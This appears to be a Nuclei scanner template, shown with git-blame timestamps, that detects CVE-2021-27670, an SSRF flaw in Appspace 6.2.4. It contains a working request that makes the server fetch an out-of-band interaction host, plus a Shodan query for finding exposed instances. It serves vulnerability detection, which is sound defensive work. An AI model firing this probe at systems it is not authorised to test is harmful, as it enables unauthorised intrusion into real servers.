2023-07-25 09:07:18 +00:00
|
|
|
id: CVE-2021-27670
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Appspace 6.2.4 - Server-Side Request Forgery
|
|
|
|
author: ritikchaddha
|
2023-08-31 11:46:18 +00:00
|
|
|
severity: critical
|
2023-07-25 09:07:18 +00:00
|
|
|
description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor.
|
2023-07-25 09:07:18 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/h3110mb/PoCSSrfApp
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27670
|
|
|
|
classification:
|
2023-08-31 11:46:18 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
2023-07-25 09:07:18 +00:00
|
|
|
cve-id: CVE-2021-27670
|
2023-08-31 11:46:18 +00:00
|
|
|
cwe-id: CWE-918
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.35076
|
2023-11-03 15:51:18 +00:00
|
|
|
epss-percentile: 0.96648
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*
|
2023-07-25 09:07:18 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-09-06 12:09:01 +00:00
|
|
|
max-request: 1
|
2023-08-31 11:46:18 +00:00
|
|
|
vendor: appspace
|
|
|
|
product: appspace
|
2023-09-06 12:09:01 +00:00
|
|
|
shodan-query: title:"Appspace"
|
2023-07-25 09:07:18 +00:00
|
|
|
tags: cve,cve2023,appspace,ssrf
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "<h1> Interactsh Server </h1>"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-11-03 17:10:29 +00:00
|
|
|
# digest: 490a00463044022040585bc06d2a953588f66c06a9f77760a2e578c7295cc0ded5051a01ac8d409302207efcc5f98827881112148e0ca08e85b052d8cf191f1f7848503df4ddfbfee8c9:922c64590222798bb761d5b6d8e72950
|